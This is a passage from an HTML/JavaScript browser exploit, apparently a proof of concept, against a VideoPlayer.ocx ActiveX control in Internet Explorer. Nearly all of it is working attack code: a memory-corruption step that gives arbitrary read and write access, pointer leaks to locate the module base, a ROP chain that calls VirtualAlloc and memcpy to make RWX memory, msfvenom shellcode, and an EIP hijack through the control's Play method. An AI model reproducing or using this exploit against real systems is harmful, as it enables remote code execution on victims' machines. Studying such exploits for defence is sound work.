its buffer point to the next typed array header at 0x1111f030 (see above)
*/
obj.SetFontName(dword2str(addr+0x20)) // WHAT TO WRITE
/* find the corrupted Uint32Array (typed array) */
k = 0
arrCorrupt = 0
while(k < 0x1000-1){
for(var i = 0; i < 0x55-1; i++){
if(arr[k][i][0] != 0){
// address of jscript9!Js::TypedArray<unsigned int>::`vftable'
//alert("0x" + arr[k][i][0].toString(16))
arrCorrupt = 1
break
}
}
if (arrCorrupt == 1) break
k++
}
if (!arrCorrupt){
alert("cannot find corrupted Uint32Array")
return -1
}
/* modify subsequent Uint32Array to be able to RW all process memory */
arr[k][i][6] = 0x7fffffff // next Uint32Array length
arr[k][i][7] = 0 // set buffer of next Uint32Array to start of process mem
/* our memory READWRITE interface :) */
mem = arr[k][i+1]
//alert(mem.length.toString(16))
if (mem.length != 0x7fffffff){
alert("Cannot change Uint32Array length")
return -2
}
/* now we could even repair the change we did with memcpy ... */
/* leak several pointers and calculate VideoPlayer.ocx base */
arr[k+1][0] = obj // set HTMLObjectElement as first element
//alert(mem[0x11120020/4].toString(16))
arrayElemPtr = mem[(addr + 0x1010)/4] // leak array elem. @ 0x11120020 (obj)
objPtr = mem[arrayElemPtr/4 + 6] // deref array elem. + 0x18
heapPtrVideoplayer = mem[objPtr/4 + 25] // deref HTMLObjectElement + 0x64
/* deref heap pointer containing VideoPlayer.ocx pointer */
videoplayerPtr = mem[heapPtrVideoplayer/4]
base = videoplayerPtr - 0x6b3b0 // calculate base
/* check if we have the image of VideoPlayer.ocx
check for MZ9000 header and "Vide" string at offset 0x6a000 */
if (mem[base/4] != 0x905a4d ||
mem[(base+0x6a000)/4] != 0x65646956){
alert("Cannot find VideoPlayer.ocx base or its version is wrong")
return -3
}
//alert(base.toString(16))
/* get VirtualAlloc from imports of VideoPlayer.ocx */
virtualAlloc = mem[(base + 0x69174)/4]
/* memcpy is available inside VideoPlayer.ocx */
memcpy = base + 0x15070
//alert("0x" + virtualAlloc.toString(16) + " " + 0x" + memcpy.toString(16))
/* create shellcode (./msfvenom -p windows/exec cmd=calc) */
sc = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"+
"\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"+
"\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"+
"\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b"+
"\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0"+
"\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b"+
"\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01"+
"\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2"+
"\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"+
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b"+
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"+
"\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b"+
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd"+
"\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"+
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"+
"\x00"
scBuf = new Uint8Array(sc.length)
for (n=0; n<sc.length; n++){
scBuf[n] = sc.charCodeAt(n)
}
/* leak shellcode address */
arr[k+1][0] = scBuf
/* therefore, leak array element at 0x11120020 (typed array header of
Uint8Array containing shellcode) ... */
elemPtr = mem[(addr + 0x1010)/4]
/* ...and deref array element + 0x1c (=> leak shellcode's buffer address) */
scAddr = mem[(elemPtr/4) + 7]
//alert(scAddr.toString(16))
/* create and leak rop buffer */
rop = new Uint32Array(0x1000)
arr[k+1][0] = rop
/* leak array element at 0x11120020 (typed array header) */
elemPtr = mem[(addr + 0x1010)/4]
/* deref array element + 0x1c (leak rop's buffer address) */
pAddr = mem[(elemPtr/4) + 7] // payload address
/* ROP chain (rets in comments are omitted) */
/* we perform:
(void*) EAX = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_RWX)
memcpy(EAX, shellcode, shellcodeLen)
(void(*)())EAX() */
offs = 0x30/4 // offset to chain after CALL [EAX+0x30]
rop[0] = base + 0x1ff6 // ADD ESP, 0x30;
rop[offs + 0x0] = base + 0x1ea1e // XCHG EAX, ESP; <-- first gadget called
rop[offs + 0x1] = virtualAlloc // allocate RWX mem (address avail. in EAX)
rop[offs + 0x2] = base + 0x10e9 // POP ECX; => pop the value at offs + 0x7
rop[offs + 0x3] = 0 // lpAddress
rop[offs + 0x4] = 0x1000 // dwSize (0x1000)
rop[offs + 0x5] = 0x1000 // flAllocationType (MEM_COMMIT)
rop[offs + 0x6] = 0x40 // flProtect (PAGE_EXECUTE_READWRITE)
rop[offs + 0x7] = pAddr + (offs+0xe)*4 // points to memcpy's dst param (*2)
rop[offs + 0x8] = base + 0x1c743 // MOV [ECX], EAX; => set dst to RWX mem
rop[offs + 0x9] = base + 0x10e9 // POP ECX;
rop[offs + 0xa] = pAddr + (offs+0xd)*4 // points to (*1) in chain
rop[offs + 0xb] = base + 0x1c743 // MOV [ECX], EAX; => set return to RWX mem
rop[offs + 0xc] = memcpy
rop[offs + 0xd] = 0xffffffff // (*1): ret addr to RWX mem filled at runtime
rop[offs + 0xe] = 0xffffffff // (*2): dst for memcpy filled at runtime
rop[offs + 0xf] = scAddr // shellcode src addr to copy to RWX mem (param2)
rop[offs + 0x10] = sc.length // length of shellcode (param3)
/* manipulate object data to gain EIP control with "Play" method */
videopObj = mem[objPtr/4 + 26]
mem[(videopObj-0x10)/4] = pAddr // pAddr will be used in EAX in below call
/* eip control @ VideoPlayer.ocx + 0x6643B: CALL DWORD PTR [EAX+0x30] */
obj.Play()
}
/* dword to little endian string */
function dword2str(dword){
str = ""
for (n=0; n<4; n++){
str += String.fromCharCode((dword >> 8*n) & 0xff)
}
return str
}
//setTimeout(run(), 3000);
</script>
</body>
</html>